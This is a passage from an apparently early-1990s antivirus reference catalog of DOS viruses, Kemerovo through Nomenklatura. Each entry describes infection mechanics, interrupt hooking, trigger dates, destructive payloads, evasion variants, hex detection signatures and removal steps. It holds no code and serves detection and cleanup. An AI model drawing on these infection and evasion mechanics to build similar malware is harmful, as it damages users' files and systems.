"kamikazi", thus the virus's name. At this point, one of several symptoms may appear: the system may be rebooted by the virus, some of the contents of memory may get displayed on the screen, or the program may complete execution having appeared to have done nothing at all. In any event, the original executed program will never run successfully, doing what the user expects. If the infected program is executed a second time, it will hang the system since it is no longer an executable program. The .EXE header has been permanently damaged due to the first 8 characters having been changed to "kamikazi" by the virus when it was first executed. Virus Name: Kemerovo Aliases: USSR 257 V Status: Rare Discovered: December, 1990 Symptoms: .COM growth; ????????COM Path not found." message; file date/time changes Origin: USSR Eff Length: 257 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Kemerovo Virus was submitted in December, 1990 and is from the USSR. This virus is a non-resident direct action infector of .COM files, including COMMAND.COM. When a program infected with the Kemerovo Virus is executed, the virus will search the current drive and directory for a .COM program to infect. If an uninfected COM program is found, the virus will infect it, adding its viral code to the end of the original program. The newly infected program's date and time in the disk directory will also be updated to the current system date and time of infection. Infected programs will increase in length by 257 bytes. If an uninfected .COM file was not found in the current directory, the message "????????COM Path not found" may be displayed and the program the user is attempting to execute will be terminated. Kemerovo does not do anything besides replicate. Virus Name: Kennedy Aliases: Dead Kennedy, 333 V Status: Endangered Discovered: April, 1990 Symptoms: .COM growth, message on trigger dates (see text), crosslinking of files, lost clusters, FAT corruption Origin: Denmark Eff Length: 333 Bytes Type Code: PNCKF - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V62+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, F-Prot 1.12+, VirHunt 2.0+, or delete infected files General Comments: The Kennedy Virus was isolated in April 1990. It is a generic infector of .COM files, including COMMAND.COM. This virus has three activation dates: June 6 (assassination of Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969), and November 22 (assassination of John F. Kennedy 1963) of any year. On activation, the virus will display a message the following message: "Kennedy is dead - long live 'The Dead Kennedys'" The following text strings can be found in the viral code: "\command.com" "The Dead Kennedys" Systems infected with the Kennedy Virus will experience crosslinking of files, lost clusters, and file allocation table errors (including messages that the file allocation table is bad). Virus Name: Keypress Aliases: V Status: Common Discovered: October, 1990 Symptoms: .COM & .EXE growth; decrease in available free memory; keystrokes repeated unexpectedly Origin: USA Eff Length: 1,232 Bytes Type Code: PRhAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V71+, Pro-Scan 2.01+ Removal Instructions: Clean-Up V71+, or Delete infected files General Comments: The Keypress Virus was reported and isolated in many locations in the United States in late October, 1990. This virus is a memory resident infector of .COM and .EXE files, including COMMAND.COM. The first time a program infected with the Keypress Virus is executed, the virus will install itself memory resident at the top of free available memory, but below the 640K DOS boundary. Interrupts 1C and 21 will be hooked by the virus. Available free memory on the system will have decreased by 1,232 bytes. After the virus is memory resident, any file executed may become infected by the virus. In the case of .COM files, they are only infected if their original file length was greater than 1,232 bytes. .EXE files of any length will be infected, as will COMMAND.COM if it is executed. Infected programs will have their directory date/time changed to the system date and time when they were infected by this virus. .COM files will increase in length by between 1,234 and 1,248 bytes upon infection. .EXE files will increase by 1,472 to 1,486 bytes upon infection. In either case, the virus will be located at the end of the infected file. The Keypress Virus activates after being memory resident for 30 minutes. Upon activation, the virus may interfer with keyboard input by repeating keystrokes. For example, if "a" is entered on the keyboard, it may be changed to "aaaaaa" by the virus. Infected files can be identified by containing the following hex string near the end of the infected program: 4333C98E1E2901CD21. Virus Name: Korea Aliases: LBC Boot V Status: Common - Korea Discovered: March, 1990 Symptoms: BSC - 360k disks Origin: Seoul, Korea Eff Length: N/A Type Code: RF - Resident Floppy Boot Sector Infector Detection Method: ViruScan V61+, VirHunt 2.0+ Removal Instructions: M-Disk, or DOS SYS Command General Comments: The Korea, or LBC Boot, Virus was isolated in March 1990 in Seoul, Korea. This virus is a memory resident boot sector infector for 5.25" 360K diskettes. The Korea virus is not intentionally destructive, it does nothing in its current form except for replicating. In some instances, when Korea infects a diskette it will damage the root directory as it moves the original boot sector to sector 11, the last sector of the root directory. If sector 11 previously contained directory entries, they will be lost. Virus Name: Lehigh Aliases: Lehigh University V Status: Rare Discovered: November, 1987 Symptoms: Corrupts boot sector & FAT Origin: Pennsylvania, USA Eff Length: N/A Type Code: ORaKT - Overwriting Resident COMMAND.COM Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk & replace COMMAND.COM with clean copy, or F-Prot General Comments: The Lehigh virus infects only the COMMAND.COM file on both floppies and hard drives. The infection mechanism is to over- write the stack space. When a disk which contains an uninfected copy of COMMAND.COM is accessed, that disk is then infected. A infection count is kept in each copy of the virus, and after 4 infections, the virus overwrites the boot sector and FATs. A variation of the Lehigh virus, Lehigh-2, exists which maintains its infection counter in RAM and corrupts the boot sector and FATs after 10 infections. Known variants of the Lehigh virus are: Lehigh-2 : Similar to Lehigh, but the infection counter is maintained in RAM, and the corruption of the boot sector and FATs occurs after 10 infections. Lehigh-B : Similar to Lehigh, the virus has been modified to avoid detection. Virus Name: Leprosy Aliases: Leprosy 1.00, News Flash V Status: Rare Discovered: August, 1990 Symptoms: unusual messages; program corruption Origin: California, USA Eff Length: 666 Bytes Type Code: ONAK - Overwriting Non-Resident .COM & .EXE Infector Detection Method: ViruScan/X V67+ Removal Instructions: Scan/D/X, or Delete infected files General Comments: The Leprosy Virus was discovered in the San Francisco Bay Area of California on August 1, 1990. This virus is a non-resident overwriting virus infecting .COM and .EXE files, including COMMAND.COM. Its original carrier file is suspected to be a file called 486COMP.ZIP which was uploaded to several BBSes. When you execute a program infected with the Leprosy virus, the virus will overwrite the first 666 bytes of all .COM and .EXE files in the directory one level up from the current directory. If the current directory is the root directory, all programs in the root directory will be infected. If COMMAND.COM is located in the directory being infected, it will also be overwritten. Infected files will show no file length increase unless they were originally less than 666 bytes in length, in which case their length will become 666 bytes. After the virus has infected the .COM and .EXE files, it will display a message. The message will be either: "Program to big to fit in memory" or: "NEWS FLASH!! Your system has been infected with the incurable decay of LEPROSY 1.00, a virus invented by PCM2 in June of 1990. Good luck!" The second message will only be displayed by one out of every seven .COM and .EXE files that the program infects. Since Leprosy is an overwriting virus, the programs which are infected with it will not function properly. In fact, once they are infected with this virus they will run for awhile (while the virus is infecting other files) and then display one of the two messages. The program execution will then end. If the system is booted from a diskette or hard drive that has Leprosy in its COMMAND.COM file, one of the above two messages will be displayed followed by: "Bad or missing Command Interpreter" This boot problem occurs because COMMAND.COM is no longer really COMMAND.COM. The boot will not proceed until a system boot diskette is inserted into the system and another boot is attempted. While Leprosy's messages are encrypted in the virus, infected files can be found by checking for the following hex string near the beginning of the file: 740AE8510046FE06F002EB08 Infected files must be deleted and replaced with clean, uninfected copies. There is no way to disinfect this virus since the first 666 bytes of the file have been overwritten, the virus does not store those bytes anywhere else. Known variant(s) of the Leprosy virus are: Leprosy-B : The major differences between the Leprosy and Leprosy-B virus are that Leprosy-B uses a slightly different encryption method, thus allowing it to avoid detection once Leprosy was isolated. Additionally, instead of infecting all programs in the directory selected for infection, Leprosy-B will infect four programs in the current directory each time an infected program is executed. If four non-infected files do not exist in the current directory, it will move up one level in the directory structure and infect up to four files in that directory. Like Leprosy, it overwrites the first 666 bytes of infected files. The Leprosy message has been replaced with the following message: "ATTENTION! Your computer has been afflicted with the incurable decay that is the fate wrought by Leprosy Strain B, a virus employing Cybernetic Mutation Technology (tm) and invented by PCM2 08/90." Leprosy-C : Also employs CMT, but with an added stealth characteristic of hooking interrupt 12. Virus Name: Liberty Aliases: V Status: Common Discovered: May, 1990 Symptoms: .COM, .EXE, .OVL growth Origin: Sydney, Australia Eff Length: 2,862 Bytes Type Code: PRfAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: VirHunt 2.0+, Clean-Up V72+, or Delete infected files General Comments: The Liberty Virus was isolated in Sydney, Australia in May, 1990. Liberty is a memory resident generic file infector, infecting .COM, .EXE, and overlay files. COMMAND.COM may also become infected. The Liberty Virus gets its name from the text string "Liberty" which will appear in all infected files. In .EXE files, it will be located in the last 3K of the file. In .COM files, it will appear near the very beginning of the program, as well as within the last 3K of the infected file. The first time a file infected with the Liberty Virus is executed, the virus will become memory resident. Liberty installs itself resident in high free memory, resulting in a decrease of 8,496 bytes of available free memory. It also directly changes the interrupt map page in memory so that interrupts 21 and 24 will put the virus in control. Total system memory does not change. After becoming memory resident, programs which are executed may be infected by the virus. All .EXE files will be infected, but only .COM files over 2K in length will become infected. Overlay files will also become infected. Infected files will increase in size between 2,862 and 2,887 bytes, and will end with the hex character string: 80722D80FA81772880. The main body of the virus will be located at the end of all infected files. Infected .COM files can also be identified by the following text string which will appear near the beginning of the infected program: "- M Y S T I C - COPYRIGHT (C) 1989-2000, by SsAsMsUsEsL" This string does not appear in infected .EXE files, the area where this string would have appeared in infected .EXE files will be 00h characters. Liberty is a self-encrypting virus. It is not yet known if it is destructive. Known variant(s) of Liberty are: Liberty-B : Isolated in November, 1990, this strain is functionally similar to the original Liberty Virus. The string which occurs at the end of all infected files has been changed to: C8004C40464842020EB. The word "MAGIC" will also be found repeated together many times in infected files. Liberty-C : Isolated in January, 1991, this variant is very similar to Liberty-B, there are 16 bytes which have been changed. Like Liberty-B, the word "MAGIC" will be found repeated together many times in infected files. The string which occurs at the end of all infected files has been changed to: C8004C404648422020E9. Virus Name: Lisbon Aliases: V Status: Rare Discovered: November, 1989 Symptoms: .COM growth, Unusable files (see text) Origin: Lisbon, Portugal Eff Length: 648 bytes Type Code: PNC - Parasitic Non-Resident COM Infector Detection Method: ViruScan V49+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, Pro-Scan 1.4+, VirexPC, F-Prot, VirHunt 2.0+ General Comments: The Lisbon virus is a strain of the Vienna virus first isolated by Jean Luz in Portugal in November, 1989. The virus is very similar to Vienna, except that almost every word in the virus has been shifted 1-2 bytes in order to avoid virus identification/detection programs which could identify the Vienna virus. 1 out of every 8 infected files will have the 1st 5 bytes of the 1st sector changed to "@AIDS", thus rendering the program unusable. Also see: Vienna Virus Name: Little Pieces Aliases: 1374 V Status: New Discovered: January, 1991 Symptoms: .COM & .EXE growth; decrease in available free memory; message; system hangs; unexpected screen clears Origin: Italy Eff Length: 1,374 Bytes Type Code: PRaE - Parasitic Resident .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected programs General Comments: The Little Pieces Virus was isolated in January, 1991, in Italy. This virus is a 1,374 byte memory resident infector of .EXE files. The first time a program infected with Little Pieces is executed, the virus will install itself memory resident. The area where it is memory resident is 1,392 bytes long and labelled COMMAND Data in low system memory. Some memory mapping utilities will combine this area with the command interpretor, so the command interpretor will appear to be 1,392 bytes longer than expected. Interrupts 13, 16, and 21 are hooked by the Little Pieces Virus. Once Little Pieces is memory resident, it will infect .EXE programs as they are executed. Infected .EXE programs will increase in size by 1,374 bytes and have the virus located at the end of the infected file. Infected files will not have their date and time in the disk directory altered. Systems infected with the Little Pieces Virus may experience the system display being cleared unexpectedly after a key is pressed on the keyboard. The following message is usually displayed after the screen is cleared, though not always: "One of these days I'm going to cut you into little pieces" This message cannot be viewed in infected files as it is encrypted within the virus. Infected system may also experience unexpected system hangs occurring, requiring the system to be rebooted. These hangs sometimes occur after the above message is displayed. Virus Name: Lozinsky Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM file growth; file date/time changes; decrease in total system and available free memory Origin: USSR Eff Length: 1,023 Bytes Type Code: PRtCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected programs General Comments: The Lozinsky Virus was submitted in December, 1990 from the USSR. Lozinsky is a memory resident infector of .COM files, including COMMAND.COM. When the first program infected with Lozinsky is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. Interrupt 12's return will be moved so that the system will report 2,048 bytes of memory less than what is actually installed. Interrupts 13 and 21 will be hooked by the virus. COMMAND.COM will also become infected at this time. After Lozinsky is memory resident, it will infect .COM files which are executed or openned for any reason. Infected programs will show a file length increase of 1,023 bytes and have the virus located at the end of the program. Their date and time in the disk directory will also have been updated to the system date and time when the program was infected by Lozinsky. It is unknown if Lozinsky does anything besides replicate. Virus Name: Mardi Bros Aliases: V Status: Rare Discovered: July, 1990 Symptoms: BSC; volume label change; decrease in system and free memory Origin: France Eff Length: N/A Type Code: FR - Floppy Boot Sector Infector Detection Method: ViruScan V66+ Removal Instructions: M-Disk, or DOS SYS Command General Comments: The Mardi Bros Virus was isolated in July 1990 in France. This virus is a memory resident infector of floppy disk boot sectors. It does not infect hard disk boot sectors or partition tables. When a system is booted from a diskette infected with the Mardi Bros Virus, the virus will install itself memory resident. It resides in 7,168 bytes above the top of memory, but below the 640K DOS Boundary. The decrease in system and free memory can be seen using the DOS CHKDSK command, or several other memory mapping utilities. Mardi Bros will infect any non-write protected diskette which is exposed to the system. Infected diskettes can be easily identified as their volume label will be changed to "Mardi Bros". The CHKDSK program will show the following for the diskette's Volume label information: "Volume Mardi Bros created ira 0, 1980 12:00a" While the infected boot sector on the diskette will have the DOS messages still remaining, it will also include the following phrase near the end: "Sudah ada vaksin" It is unknown if Mardi Bros is destructive, it appears to do nothing but spread. Mardi Bros can be removed from infected diskettes by first powering off the system and rebooting from a known clean write protected DOS master diskette. The DOS SYS command should then be used to replace the infected diskette's boot sector. Alternately, MDisk can be used following the power-down and reboot. Virus Name: MG Aliases: V Status: New Discovered: September, 1990 Symptoms: .COM file growth; DIR command may not function properly; File allocation errors; System hangs Origin: Bulgaria Eff Length: 500 Bytes Type Code: PRCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The MG Virus was submitted in January, 1991, though it has been mentioned by Bulgarian researchers several times since September, 1990. This virus is named MG as it was originally isolated at Matematicheska Gimnazia, a school in Varna, Bulgaria. It is a memory resident infector of .COM files, including COMMAND.COM. The first time a program infected with MG is executed, the virus will install itself memory resident in a portion of the interrupt table in memory. Interrupt 24 is hooked by the virus, as are several other interrupts. After MG is memory resident, it will infect programs when one of two things occurs: either the user attempts to execute any program, or a Dir command is performed. In the case of a program being executed, the virus will infect one program in the current directory, though not necessarily the program being executed. When a Dir command is executed, one program in the current directory will be infected as well. .COM programs infected with MG will increase in length by 500 bytes, though the file length increase will not be visible in a dir listing if the virus is memory resident. File date and time in the disk directory are also not altered. The virus will be located at the end of infected programs. Symptoms of a MG infection are that the DOS Chkdsk program will show File allocation errors on all infected .COM programs if the virus is present in memory. The DOS Dir command may also not function properly, for example DIR A:.COM will yield "File not found" even though .COM files exist on the A: drive. At other times, pauses will occur in the disk directory being displayed by the Dir command. Another symptom is that unexpected system hangs may occur due to the interrupt table being infected in memory. Also see: MG-2 Virus Name: MG-2 Aliases: V Status: New Discovered: December, 1990 Symptoms: .COM file growth; File Allocation Errors; Dir command may not function properly Origin: Bulgaria Eff Length: 500 Bytes Type Code: PRsCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The MG-2 Virus was received in December, 1990, and is believed to have originated in Bulgaria. This virus is a direct action, memory resident infector of .COM programs, including COMMAND.COM. When a program infected with the MG-2 Virus is first executed, the virus will install itself memory resident. The DOS ChkDsk command, when executed on an infected system, will indicate that total system memory and available free memory have decreased by 55,104 bytes. This virus remaps many interrupts, including interrupt 24. A portion of the virus will also be resident above 640K if memory is available. After the MG-2 Virus is memory resident, it will infect one .COM program in the current directory each time an infected .COM program is executed. Infected .COM programs will not show a file length increase if the virus is memory resident. With the virus memory resident, the DOS ChkDsk command will indicate a file allocation error for all infected files. Infected files actually increase 500 bytes in length and have the virus located at the end of the infected file. Systems infected with the MG-2 Virus may notice that the DOS Dir command does not always return the results expected. For example, issuing a "DIR C:\DOS" command may result in the C: drive root directory being displayed instead of the C:\DOS directory. Another case is that issuing the command "DIR A:.COM" will result in "File not found" though .COM files exist on that drive. Known variant(s) of MG-2 are: MG-3 : Functionally similar to MG-2, this variant has been altered to avoid detection. It is also 500 bytes in length. Also see: MG Virus Name: MGTU Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM file growth; excessive disk activity; file date/time changes; "????????COM Path not found." message Origin: USSR Eff Length: 273 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The MGTU Virus was submitted in December, 1990 and came from the USSR. This virus is a non-resident direct action infector of .COM files, including COMMAND.COM. When a program infected with the MGTU Virus is executed, the virus will search the current drive and directory for uninfected .COM programs. All uninfected .COM programs will become infected with the virus. Infected .COM programs will have a file length increase of 273 bytes with the virus being located at the end of the file. Their date and time in the disk directory will also have been updated to the system date and time when infection occurred. Infected systems will display excessive disk activity each time an infected program is executed. This activity occurs because the virus is checking all of the .COM programs in the current directory to determine if they are already infected, or if they need to be infected. Infected systems may also experience the following message being displayed for no apparent reason: "????????COM Path not found." MGTU does not do anything besides replicate. Virus Name: Microbes Aliases: V Status: Common - India Discovered: June, 1990 Symptoms: BSR Origin: Bombay, India Eff Length: N/A Type Code: BR - Floppy and Hard Disk Boot Sector Infector Detection Method: ViruScan V64+, Pro-Scan 1.4+ Removal Instructions: M-Disk, Pro-Scan 1.4+, or DOS SYS Command General Comments: The Microbes virus was isolated in June, 1990 in India. It is a memory resident boot sector infector of both floppy diskettes and hard disks. The Microbes virus becomes memory resident when a system is booted from a disk infected with the Microbes virus. The system may hang on this boot, and inserted a diskette to boot from will result in this new diskette becoming infected. At least on the author's XT test system, the system could not successfully boot with the Microbes virus present without powering off the system and rebooting from a write protected master boot diskette. As with other boot sector infectors, Microbes can be disinfected from diskettes and hard drives by powering off the system and booting from a known clean write protected master boot diskette for the system. The DOS SYS command can then be used to recreate the boot sector on the diskette. Virus Name: Mirror Aliases: V Status: Rare Discovered: October, 1990 Symptoms: .EXE growth; decrease in available free memory; mirror effect of display on activation Origin: Unknown Eff Length: 927 Bytes Type Code: PRhE - Parasitic Resident .EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Mirror Virus was discovered in October, 1990. This virus is a memory resident direct action infector of .EXE files. The first time a program infected with the Mirror Virus is executed, the virus will install itself memory resident at the top of free available memory. Free available memory will decrease by 928 bytes, and the virus will hook interrupt 21. At this time, the virus will also infect all other .EXE programs located in the current directory. Infected programs will increase in length by 927 to 940 bytes, with the virus being located at the end of the infected file. Infected programs will also always end with the two text characters "IH". The Mirror Virus gets its name from its behavior. Every once in awhile it will change the system's video display so that a mirror image of what was previously on the display appears. Virus Name: MIX/1 Aliases: MIX1, Mix1 V Status: Rare Discovered: August, 1989 Symptoms: TSR, .EXE growth, location 0:33C = 77h, garbled output Origin: Israel Eff Length: 1,618 Bytes Type Code: PRsE - Parasitic Resident .EXE Infector Detection Method: ViruScan V37+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, Virus Buster, Pro-Scan 1.4+, VirexPC 1.1B+, F-Prot, VirHunt 2.0+ General Comments: The MIX1 Virus was originally isolated on August 22, 1989, on several BBSs in Israel. This virus is a parasitic memory- resident .EXE file infector. Once an infected program has been executed, the virus will take up 2,048 bytes in RAM. Each .EXE file then executed will grow in length between 1,618 and 1,634 bytes, depending on the original file size. The virus will not, however, infect files of less than 8K in size. Infected files can be manually identified by a characteristic "MIX1" always being the last 4 bytes of an infected file. Using Debug, if byte 0:33C equals 77h, then the MIX1 virus is in memory. This virus will cause garbled output on both serial and parallel devices, as well as the num-lock being constantly on. After the 6th infection, booting the system will crash the system due to a bug in the code, and a ball will start bouncing on the system monitor. There is a variant of this virus which does not have the problem of system crashes occurring, and will only infect files that are greater than 16K in length. Mix/1 has several code similarities to Icelandic, which it may have been derived from. Also see: Icelandic Virus Name: Monxla Aliases: Time Virus V Status: Rare Discovered: November, 1990 Symptoms: .COM growth; system hangs and/or reboots; program execution failures Origin: Hungary Eff Length: 939 Bytes Type Code: PRfCK - Parasitic Resident .COM Infector Detection Method: ViruScan V71+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Monxla, or Time, Virus was discovered in November, 1990 in Hungary. This virus is a memory resident direct action infector of .COM files, including COMMAND.COM. When a program infected with the Monxla Virus is executed, the virus will check the current system time. If the system time's current seconds is greater than 32/100's of a second, the virus will install a very small portion of itself memory resident at the top of free memory but below the 640K DOS boundary. The virus allocates 80 bytes, and will hook interrupts 20 and F2. The F2 interrupt is later used to determine if the virus is in memory, thus avoiding multiple memory allocations. The memory resident portion of the virus is not used to infect files. Each time a program infected with the Monxla Virus is executed, the virus will search for one uninfected .COM file with a length between 3,840 and 64,000 bytes to infect. The current directory is searched first, and then the directories along the system path. Once an uninfected .COM file is found that satisfies the length requirement, the virus will infect it. On other than the 13th day of any month, the virus will add its viral code to the end of the candidate file, increasing the file's length by 939 bytes. On the 13th day of any month, the virus activates. The activation involves damaging the files that it infects based on the current seconds in the system time. At the time the virus attempts to infect another .COM file, the virus will damage the file in one of three ways. If the current seconds was greater than 60/100's, 4 HLTs followed by a random interrupt will be placed at the beginning of the file being infected. Later when the program is executed, it may perform rather strangely be destructive. It depends on what the random interrupt was. If the current seconds was greater than 30/100's, but less than 60/100's, two INT 19 calls are placed at the beginning of the file. Later when the program is executed, it will attempt to perform a warm reboot preserving the current interrupt vectors. This, however, will result in a system hang if any interrupt between 00h and 1Ch was previously hooked. If the current seconds was greater than 00/100's but less than 30/100's, a INT 20 call is placed at the beginning of the program being infected, thus resulting in it immediately terminating when later executed. Virus Name: Monxla B Aliases: Time B V Status: New Discovered: January, 1991 Symptoms: .COM growth; File corruption Origin: Hungary Eff Length: 535 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Monxla B Virus was isolated in January, 1991 in Hungary. This virus is a non-resident direct action infector of .COM files, including COMMAND.COM. When a program infected with Monxla B is executed, the virus will check the seconds portion of the system time. Depending on the value found, either one .COM program in the current directory will be infected, or one .COM program in the current directory will be corrupted. If the seconds portion of the system time is equal 0 or a multiple of 8, one .COM program in the current directory, or on the system path, will be corrupted by the first five characters of the selected .COM program being changed to the hex string: 004D004F4D, or " M OM" in text. Corrupted programs will not have a file length increase. Later execution of these corrupted programs will usually result in the system being hung, requiring a reboot. If the seconds portion of the system time was not 0 or a multiple of 8, a .COM program in the current directory will be infected with Monxla B. If no programs exist in the current directory which are neither corrupted or infected, the virus will follow the system path to find a candidate program to infect. Infected .COM programs will increase in length by 535 bytes, the virus will be located at the end of infected programs. The virus will also have changed the seconds in the file time in the disk directory to 58 so that the virus can later tell that the file is infected. Virus Name: Murphy Aliases: Murphy-1, V1277, Stealth Virus V Status: Common - Bulgaria Discovered: April, 1990 Symptoms: .COM & .EXE growth, system hangs, speaker noise, possible bouncing ball effect (see Murphy-2 below) Origin: Sofia, Bulgaria Eff Length: 1,277 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+, F-Prot 1.12+ Removal Instructions: Scan/D, Pro-Scan 1.4+, or Delete infected files General Comments: The Murphy Virus was isolated in Bulgaria in April, 1990. It is a memory resident generic .COM & .EXE infector, and will infect COMMAND.COM. The first time an infected program is executed on a system, the virus installs itself memory resident. After it is memory resident, if a file is executed, or openned for any reason, it is infected by the Murphy Virus. When the first non-infected program is executed with the virus in memory, the virus will attempt to infect COMMAND.COM. The program being executed will also be infected at that time. Infected programs will increase in length by 1,277 Bytes. Programs which are less than 1,277 Bytes in length will not be infected. The Murphy Virus watches the system time. When the system time is between 10AM and 11AM, the virus will turn on the system speaker and send a 61h to it. At any other time, the virus will not attempt to use the system speaker. The following text message is contained within the Murphy Virus, giving an idea of when it was written and by whom, though they are not displayed: "Hello, I'm Murphy. Nice to meet you friend. I'm written since Nov/Dec. Copywrite ©1989 by Lubo & Ian, Sofia, USM Laboratory." Systems infected by the Murphy Virus may also experience system hangs when the virus attempts to infect .EXE files. Known variant(s) of the Murphy Virus are: Murphy-2 or V1521 - Similar to the Murphy Virus, its length is 1,521 Bytes. The non-displayed messages in the virus are now: "It's me - Murphy. Copywrite ©1990 by Lubo & Ian, Sofia, USM Laboratory." The Murphy-2 will infect any .EXE file, as well as any .COM file over 900 Bytes. Instead of turning the system speaker on between 10AM and 11AM, this variant waits for the system time to have the minutes set to 00, then it may have a "bouncing ball" effect similar to several other viruses. This effect does not, however, occur on all systems. Virus Name: MusicBug Aliases: Music Boot, Music Bug V Status: Common Discovered: December, 1990 Symptoms: decrease in total system and available free memory; clicking; music randomly played on system speaker; lost clusters Origin: Taiwan Eff Length: N/A Type Code: BRtX - Resident Boot Sector & Partition Table Infector Detection Method: ViruScan V72+ Removal Instructions: Clean-Up V74+, or see below General Comments: The MusicBug Virus is a memory resident boot sector and partition table infector discovered in December, 1990. It originated in Taiwan. When a system is booted from a diskette infected with the MusicBug Virus, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. The interrupt 12 return will be moved, so 640K systems will now report 638K of installed system memory. Clicking may be heard for a short time from the system speaker before the boot proceeds, but more likely a section of a tune will be played. The boot will then proceed. Once MusicBug is memory resident, it will periodically play another portion of the same tune when disk accesses occur. It is thus rather disruptive. When MusicBug is memory resident, any disk accessed (including the system hard disk) will become infected with the virus. In the case of hard disks, MusicBug infects the hard disk partition table and boot sector. Infected disks will have 4K in lost clusters which will contain the virus's code as well as a copy of the disk's original boot sector. The following text strings can also be found in these lost clusters: "MusicBug v1.06. MacroSoft Corp." "Made in Taiwan" Diskettes infected with the MusicBug Virus can be disinfected after powering off the system and booting from a write protected system diskette, then using the DOS SYS command. The lost clusters can then be removed by using the ChkDsk command with the /F parameter. Hard disks, however, cannot be disinfected in the same way. While the DOS SYS command will remove the virus from the hard disk's boot sector, and the lost clusters can be recovered, the hard disk will remain an unbootable non-system disk until a low-level format is performed. Virus Name: New Jerusalem Aliases: V Status: Rare Discovered: October, 1989 Symptoms: TSR; .EXE, .COM, etc. (see below) growth; system slowdown; deleted files on Friday 13th Origin: Holland Eff Length: 1,813 Bytes (.COM) & 1,808 Bytes (.EXE) Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V45+, F-Prot, Pro-Scan 1.4+ Removal Instructions: Saturday, CleanUp, F-Prot, Pro-Scan 1.4+ General Comments: New Jerusalem is a variation of the original Jerusalem virus which has been modified to be undetectable by ViruScan versions prior to V45 as well as IBM's VIRSCAN product as of October 20, 1989. The virus was first detected when it was uploaded to several BBSs in Holland beginning on October 14, 1989. It infects both .EXE and .COM files and activates on any Friday The 13th, deleting infected programs when they are attempted to be run. This virus is memory resident, and as with other Jerusalem viruses, may infect overlay, .SYS, .BIN, and .PIF files. Also see: Jerusalem, Jerusalem B, Payday, Suriv 3.00 Virus Name: Nina Aliases: V Status: New Discovered: December, 1990 Symptoms: .COM growth; decrease in total system and available free memory; Origin: Bulgaria Eff Length: 256 Bytes Type Code: PRhCK - Parasitic Resident .COM & Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Nina Virus was received in December, 1990, and is from Bulgaria. This virus is a memory resident infector of .COM files, including COMMAND.COM. When the first program infected with the Nina Virus is executed, Nina will install itself memory resident at the top of system memory but below the 640K DOS boundary. Total system memory and available free memory will decrease by 1,024 bytes as shown by the DOS ChkDsk command. Interrupt 21 will be hooked by the virus. After Nina is memory resident, it will infect .COM programs that are greater than 256 bytes in length as they are executed. If COMMAND.COM is executed, it will become infected. Infected .COM programs increase in length by 256 bytes, and will have the virus located at the beginning of the infected file. The Nina Virus is named Nina because the virus contains the text string "Nina" within the viral code. This virus does not do anything besides replicate. Virus Name: Nomenklatura Aliases: Nomenclature, 1024-B V Status: Rare Discovered: August, 1990 Symptoms: .EXE, .COM growth; decrease in available free memory; "sector not found" messages on diskettes; Origin: Netherlands Eff Length: 1,024 Bytes Type Code: PRhAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D or Delete infected files General Comments: The Nomenklatura Virus was isolated in August, 1990 in the Netherlands. This virus is a memory resident infector of .COM and .EXE files, including COMMAND.COM. It is not related to the V1024 virus, though it is the same length. The first time a program infected with the Nomenklatura Virus is executed on a system, the virus installs itself memory resident at the top of available system memory, but below the 640K DOS boundary. Available system memory will decrease by 1,024 bytes, and interrupt 21 will be hooked by the virus. When the virus is memory resident, any .COM or .EXE program greater in length then approximately 1,023 bytes that is executed or openned for any reason will be infected by the Nomenklatura virus. Infected files will have their file lengths increased by 1,024 bytes. The virus does not hide the increase in file length when the disk directory is displayed. Attempts to execute uninfected programs from a write-protected diskette with the virus in memory will result in a "Sector not found error" message being displayed, and the program not being executed. The Nomenklatura Virus is destructive to the contents of diskettes exposed to infected systems. File corruption will randomly occur, with the frequency increasing as the disk becomes more filled with data. The file errors may occur on data files as well program files. This file corruption occurs due to the virus occassionally swapping a pair of words in the sector buffer. It may also do this to critical system areas such as the FAT, boot sector, or directories since it may occur to any clusters on the disk. If a file or critical system area was residing in a corrupted cluster, it will be corrupted. As such, systems which has been exposed to the Nomenklatura Virus must be carefully checked as the integrity of non-infected programs and any datafiles should be considered suspect. The virus has been named Nomenklatura as this text string appears in all programs infected with this virus. Virus Name: Number One Aliases: Number 1 V Status: Extinct Discovered: 1987 (see below) Symptoms: .COM files fail to function; <Smile> displayed Origin: West Germany Eff Length: 12,032 Bytes 